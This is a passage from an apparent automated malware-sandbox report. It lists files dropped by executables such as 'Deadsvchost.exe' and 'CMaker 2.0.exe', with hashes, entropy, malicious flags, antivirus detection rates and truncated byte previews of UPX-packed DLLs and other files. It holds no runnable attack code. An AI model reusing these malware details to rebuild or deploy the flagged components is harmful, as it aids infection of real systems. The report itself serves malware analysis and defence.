                                                                                                                                                                                Entropy (8bit):5.389928136181357
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclT:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/E
                                                                                                                                                                                MD5:6B2359BF987F4BDAF6CB014F63217859
                                                                                                                                                                                SHA1:3894B16E010FEFF2E71BEE0274746FC34C57C1DF
                                                                                                                                                                                SHA-256:ED763CED7BDAE1851B6A82D1D3685E9CC94937ADADD492DD2C1AC0AB639227FD
                                                                                                                                                                                SHA-512:C440BE0810F8CF29ADB6E816DA07A673C1E60E926926B2E863AFE7529C2D5EDB6118335C535CD0B4F0F7D7D6E5FE9801328A37FA4012F7D4B737F6F099A1489D
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64
                                                                                                                                                                                Process:C:\Users\Public\Deadsvchost.exe
                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):654
                                                                                                                                                                                Entropy (8bit):5.380476433908377
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                                                                                                                Process:C:\Users\user\Desktop\aoKTzGQSRP.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):512512
                                                                                                                                                                                Entropy (8bit):4.011952127732658
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12288:kU43i+9MrOq5q7pN37VvbvH3pJJtlueGAmp8R6LqSY4JiFZlmM5Ki634:V4JZDhAWS2ZN
                                                                                                                                                                                MD5:E1C82191B678CEA8F3C996887DDC1232
                                                                                                                                                                                SHA1:7946006CA278892817B7A778EEA1E04F5B2F948C
                                                                                                                                                                                SHA-256:BD00A7577088B67B52699F956275A3F563D623CA907FEEEAEE8D2F821D35DE40
                                                                                                                                                                                SHA-512:CB1499DB7C1A7B3C4436D02A1218A055F9C04D7B4AE2CA01FD179A6BDB74C30C8CDA1FFDA8B61DCC3397B97351B77D683295CB46701A614CF7341906BD807804
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                Process:C:\Users\user\Desktop\aoKTzGQSRP.exe
                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):9629457
                                                                                                                                                                                Entropy (8bit):7.9880897173365195
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:196608:6aEILT2/mtStLjv+bhqNVobRUh8mUAneulFO+d:nNLTBtSVL+9qzGyuuld
                                                                                                                                                                                MD5:CC32561980C2400C490A4849C78E38ED
                                                                                                                                                                                SHA1:4652E5D3B0CCCD5A83F685672677F1E60A2BC07E
                                                                                                                                                                                SHA-256:6FF3F4971A2158C77969C28C2C574568E322931D40440DB60DFFDED695935AC5
                                                                                                                                                                                SHA-512:0D1D6D3187E6ECAFB8014B4C14F42158647CA575039EC4389226A1B7C6ABBD2E0186469DFD3774B0D92784346B8B288A0F3A9F1CB8BDE3FDC0DC756E5EA8412A
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):109392
                                                                                                                                                                                Entropy (8bit):6.641929675972235
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
                                                                                                                                                                                MD5:4585A96CC4EEF6AAFD5E27EA09147DC6
                                                                                                                                                                                SHA1:489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
                                                                                                                                                                                SHA-256:A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
                                                                                                                                                                                SHA-512:D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d..._#;..........." ...".....`......................................................=.....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):49432
                                                                                                                                                                                Entropy (8bit):7.8135914033786475
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:25xdYKhY/Y5bQMskWu3IVCVJv7SyhJDxhy:OxdYKS/Y5RJRIVCVJvXpy
                                                                                                                                                                                MD5:F807854B836AB1E84FCDB11560216929
                                                                                                                                                                                SHA1:627EF83CA0611D9CB267C72DFCCF2F0A30297D7C
                                                                                                                                                                                SHA-256:5847649160F3F1564E26CBA88E70BD159CC5CEA08A1BF07ECD5B7796A49D259E
                                                                                                                                                                                SHA-512:85C28890F2FA4EA6D4F295D41FFC11109D217449CD6F77EA4A901D3F681C67F1ABF59FDC5DEAD503DB99BA766D1C51EE5505E456A3B605374B00E3FF832ADD1D
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w.l.3...3...3...:...9......1......0......>......;......7.......0...x...1...3...l.......;.......2.......2.......2...Rich3...................PE..d......e.........." ...#............pd....................................................`.............................................H.................... .. ..................................................pp..@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):72704
                                                                                                                                                                                Entropy (8bit):7.910249809084461
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:mmtchbmUHui4ehi47gdUCK41d34AANP8zj6V:/uhKUHuwPMO9y10P83
                                                                                                                                                                                MD5:2443ECADDFE40EE5130539024324E7FC
                                                                                                                                                                                SHA1:EA74AAF7848DE0A078A1510C3430246708631108
                                                                                                                                                                                SHA-256:9A5892AC0CD00C44CD7744D60C9459F302D5984DDB395CAEA52E4D8FD9BCA2DA
                                                                                                                                                                                SHA-512:5896AF78CF208E1350CF2C31F913AA100098DD1CF4BAE77CD2A36EC7695015986EC9913DF8D2EBC9992F8F7D48BBA102647DC5EE7F776593AE7BE36F46BD5C93
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........ ..MA.CMA.CMA.CD9MCAA.C.4.BOA.C+.#CIA.C.4.BFA.C.4.BEA.C.4.BIA.C.9.BIA.C.=.BNA.CMA.C.A.C.4.BIA.CD9KCLA.C.4.BLA.C.4!CLA.C.4.BLA.CRichMA.C........................PE..d...,..e.........." ..... .......@...R...P................................................`..........................................s..l....p.......p..........<...........ht..$....................................^..8...........................................UPX0.....@..............................UPX1..... ...P......................@....rsrc........p......................@..............................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):59672
                                                                                                                                                                                Entropy (8bit):7.82957734909026
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:aAUOlRrHrPcX1nBeXfeIO/h8mLwj46IVLPZp7SyIx9:alOLL0FnIXm/yk6IVLPZpo
                                                                                                                                                                                MD5:955A3624921B140BF6ACABA5FCA4AC3B
                                                                                                                                                                                SHA1:027E0AF89A1DBF5EF235BD4293595BBC12639C28
                                                                                                                                                                                SHA-256:EA07594B2EEDE262D038DE13A64B76301EDFBDA11F885AFA581917B1FB969238
                                                                                                                                                                                SHA-512:B115E83061C11AAF0A0F1131A18BE5B520C5CBC3975F5B7A1E9CEA06B0AFF7A2815165FCD1F09BA1EFCF7C185E37E84A0B6AD4EEFEA3049A369BDF46ED3D2CB7
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.....................).....).....).....).....O...............W.......c.O.....O.....O.o...O.....Rich..........................PE..d......e.........." ...#.........`.......p...................................0............`.........................................H,.......)....... .......................,..........................................@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):109336
                                                                                                                                                                                Entropy (8bit):7.933037133644081
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:JOt51H+NnBZBmb1fZGlHc9ye/U65Qka1RkT1IJ5NrIecwgWN/xiNIVOqHC07SyiY:czanBZkGlmRc1en8R/iIVOqHC0r
                                                                                                                                                                                MD5:D967BEA935300A9DA0CD50BF5359A6EA
                                                                                                                                                                                SHA1:4C2FD9A31AABC90172D41979FB64385FDA79C028
                                                                                                                                                                                SHA-256:4B312A03C3A95BD301F095AB4201E2998A3C05E52FCD16C62AB1E51341F54AF2
                                                                                                                                                                                SHA-512:7BAA39A35BEAD863833EFD7519C761E8CD4E15B35825427CF654181534F41C9ABCDD85E017DAEB9AFEFE291D6C2741505BF7EEF30D4D25D53ADA82646857F356
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.R.!...!...!...Y=..!..+]...!..+]...!..+]...!..+]...!..M\...!...Y...!...!...!..M\...!..M\...!..M\...!..M\Q..!..M\...!..Rich.!..........PE..d......e.........." ...#.p...................................................0............`..........................................,..P....)....... ..........$'...........-..........................................@...........................................UPX0....................................UPX1.....p.......j..................@....rsrc........ .......n..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):36632
                                                                                                                                                                                Entropy (8bit):7.654026577022311
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:x35lZrQBDJLFSRN0cp71I6Pm9zje2pojcIVOI8a5YiSyvELAMxkE1R1:N5YbLkfzpIwm9zK1jcIVOI847SyMrxZz
                                                                                                                                                                                MD5:BEAC22863EE05D291190B6ABF45463C0
                                                                                                                                                                                SHA1:94CC19E31E550D7FD9743BBD74BFE0217CDDE7F9
                                                                                                                                                                                SHA-256:C1C3856EE8E86C8E5CF2B436C1426067F99A40C0DA4CBEA4E0B52582CD7B6B5B
                                                                                                                                                                                SHA-512:8AE651B912C0F9F2C431A4D3F1C769746F787BDD70CE53626106C903CB3F364CB1BAE7E6E2476868420ABD849A990C5604C533BC64B0EBA149F6BC36514A6F66
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(t..F'..F'..F'..'..F'u.G&..F'u.C&..F'u.B&..F'u.E&..F'..G&..F'..G&..F'..G'B.F'..K&..F'..F&..F'...'..F'..D&..F'Rich..F'................PE..d......e.........." ...#.P...........!.......................................@............`.........................................|;..P....9.......0.......................;.......................................-..@...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):87832
                                                                                                                                                                                Entropy (8bit):7.91494851779059
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:0ZMcTNiSSlZFto5ChAwRYMekiq/xFQhIHFB38EtW9ue20dcwfgpPzLNLJcIVZ1Ch:kTJitRLeZq/fZH3Ns9D2WcGgthLGIVZI
                                                                                                                                                                                MD5:872FEA740D2AE4D8B9BB2AC95059F52B
                                                                                                                                                                                SHA1:22274E636E2EF57AD16CCF0EB49A2FF3E37BA080
                                                                                                                                                                                SHA-256:C9A4162DF80A99E4723DD60BDF34B8FEFC4005F7865DC3E6D86833D84FA25DA2
                                                                                                                                                                                SHA-512:F85D1B6602826B21F12A873176F7A5C857C3213AE329ED7A0B8F7D9B1A791EDC5549D8FCE3C5D2305CE40A4D8A57D9845B2956D42D374DE78D5324703D5DFA03
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T"#.5Lp.5Lp.5Lp.M.p.5Lp.IMq.5Lp.IIq.5Lp.IHq.5Lp.IOq.5LpnHMq.5Lp.MMq.5Lp.5Mp.5LpnHAq.5LpnHLq.5LpnH.p.5LpnHNq.5LpRich.5Lp................PE..d......e.........." ...#. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):26392
                                                                                                                                                                                Entropy (8bit):7.484232189428478
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:P1ihFuym2pDjIVQU8v5YiSyvyxAMxkE44:EXmqjIVQU8B7Sy+xE4
                                                                                                                                                                                MD5:C3CEA46D675E3F2A00F7AF212521C423
                                                                                                                                                                                SHA1:0A7C76039E0ED61E3853C4C553BB6CFC9CBD2C7C
                                                                                                                                                                                SHA-256:02B62AEE4867505E3D12A3ABD0288CF7A75658AC908D06F5B24FDB178094E29D
                                                                                                                                                                                SHA-512:8D9AF1D88A2A9528096388DB3BD4FF8ADD480EF94689E851FA4C5A68EC9B97C561B2EDFC7E34061BEB7BCC26B884A0A06AF196008D8705D0284B22878C95289E
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B:WX.[9..[9..[9..#...[9..'8..[9..'<..[9..'=..[9..':..[9..&8..[9.M#8..[9..[8.L[9..&4..[9..&9..[9..&...[9..&;..[9.Rich.[9.........PE..d......e.........." ...#.0................................................................`.............................................L.......P............`..............<...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):44312
Entropy (8bit):7.717509871918743
Encrypted:false
SSDEEP:768:wAQ8MABQVaAwmySb0TrgeBYdEpZbqIVLwJF65YiSyvTAMxkEY:wATIzwF/JbqIVLwJFY7SyLxU
MD5:9505AFE166EB419F5A1D33FF1254722E
SHA1:F343D7B444EB58033086DE5376725DEDA5E0E418
SHA-256:AF42A1C35155EB989332C25A81D6E2ED08D8E33718D18D32BA5B00092F2A0F21
SHA-512:46B7C86D3384DB9ADB8F1F52B83AAAC398547AB86BC07800B0EB87E9ABEB9D97E24FB8A70F01224D7C4E8A2A532D9353AD1C1F91D0416B429B87EE0EBE1DAEC4
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.+.".E.".E.".E.+...$.E...D. .E...@./.E...A.*.E...F.!.E...D. .E.".D...E.i.D.%.E...H.#.E...E.#.E....#.E...G.#.E.Rich".E.........................PE..d......e.........." ...#.p...........m....................................................`.............................................P.......h............ ..x...........X........................................y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):66840
Entropy (8bit):7.864649468753277
Encrypted:false
SSDEEP:1536:fbCYwNqce1LbV8uQvTLwNsDgzg+JR15xzf5/5JrwIVC7y3S7Syykx0:fuYwNABQQxzhRTxTx5JcIVC7yCa
MD5:D8567F88C0C935C77D2258C7C9DB4CA4
SHA1:1DECC299B3E58F8401264354F3874DD2F0D7CD0A
SHA-256:9A7E02CF4C66CC6BE6B2BF03282B4D88F16D12EB10EA78F36CDCE0776F6A6289
SHA-512:FAA5067C4ED2143D316ABF96AE096A1229B7450C9D3A850C496B484794897B246C59716F096806982D9C74CB3799A94C8DDCE646EB990CA89086F8D16D4C5EA9
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U.+.4.x.4.x.4.x.L)x.4.x.H.y.4.x.H.y.4.x.H.y.4.x.H.y.4.xiI.y.4.x.4.x>5.x.L.y.4.xiI.y.4.xiI.y.4.xiIEx.4.xiI.y.4.xRich.4.x................PE..d......e.........." ...#.........@.......P...................................0............`.........................................l,..d....)....... .......................,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):1440734
Entropy (8bit):5.590357601341388
Encrypted:false
SSDEEP:24576:DQR5pATGCfR5lUKdcubgAnyPbU6DUiwhtdYfXP3eRHH7:DQR5pKfR0Dy
MD5:79ED698B506BCD32F598D0D79F214351
SHA1:05478D5A1A88AB86B8E607198AFDE7BC21485042
SHA-256:889CBD41072C09E669AF734B5D05C42FF5F7C93F4C4D39BCCCC82DEB71CB4B5F
SHA-512:118EA14DD181181FD125C405F35FBC73000D9F543E72DC2BA5DEF88DF39AE32D64FC52C869E07B613B26DBC82A6A7C421369C42BFAE56C8B19520841602B2D65
Malicious:false
                                                                                                                                                                                Preview:PK..........!.W*..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................
Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
File Type:ASCII text
Category:dropped
Size (bytes):293951
Entropy (8bit):6.047861624689767
Encrypted:false
SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5NP:QWb/TRJLWURrI55MWavdF0J
MD5:2A6BEF11D1F4672F86D3321B38F81220
SHA1:B4146C66E7E24312882D33B16B2EE140CB764B0E
SHA-256:1605D0D39C5E25D67E7838DA6A17DCF2E8C6CFA79030E8FB0318E35F5495493C
SHA-512:500DFFF929D803B0121796E8C1A30BDFCB149318A4A4DE460451E093E4CBD568CD12AB20D0294E0BFA7EFBD001DE968CCA4C61072218441D4FA7FD9EDF7236D9
Malicious:false
                                                                                                                                                                                Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz
Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):9728
Entropy (8bit):6.602455534392622
Encrypted:false
SSDEEP:96:KGWjp/QthczuG47NfGTJiWpmLeiRrRcfuljG2+wUiVzTkYBbPJBj34lVhXg246aw:C6tq4hfGNpeeiTJxTkYj273QJXpHI8O
MD5:351716E8C896F52BB9F646FDD2E9426A
SHA1:3B7287956CC2A83BF0CE6E5506299D137E5CD8E2
SHA-256:8B96589636A860BC793D793CD1571BB5DE8A73D56A7A4778F3F6B4C40DE81506
SHA-512:81AAA6E404F0C4B3112CAD16597DFF70F841506B766B4C6BD86947C04A64E77C3BB50196884CA633FC3912E62F8266E6D470498E0206BC709C9AC24556BD3331
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..............................M....................................... ...?.......?.......?.a.....?.......Rich............................PE..d...siAe.........." ...%. .......p........................................................`.........................................@...p......P............@..........................................................@...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc................"..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):39936
Entropy (8bit):7.825047062255573
Encrypted:false
SSDEEP:768:kJWJjbkBClgXZHm7SIwqvEz/u11zxms4bpqK:7ADmvwvzYWLgK
MD5:FE25C057A924B06E0EC524C8BB809C5F
SHA1:B3AD1FC755273D1F4577DEE0525919BFCB323B93
SHA-256:35C25DE8080987E5A9280CD185134D7A37F0086DEA53EC53156126B780999D0B
SHA-512:8816E65538090ECDD4B52EDABBE909142C3CE23C5BBF781CD1B381F70059E194E117ABD67D0A4634D83B6A7E7395C7C9AAB0C9EBFEE0756A8C97FFA5122BC059
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..r...r...r......r...s...r...s...r...w...r...v..r...q...r.#.s...r...s...r..8z...r..8r...r..8....r..8p...r.Rich..r.........................PE..d...siAe.........." ...%.............5.......................................`............`..........................................R..d....P.......P......................<S.......................................A..@...........................................UPX0....................................UPX1................................@....rsrc........P......................@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
File Type:ASCII text
Category:dropped
Size (bytes):4
Entropy (8bit):1.5
Encrypted:false
SSDEEP:3:Mn:M
MD5:365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:false
Preview:pip.
Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
File Type:ASCII text
Category:dropped
Size (bytes):197
Entropy (8bit):4.61968998873571
Encrypted:false
SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
MD5:8C3617DB4FB6FAE01F1D253AB91511E4
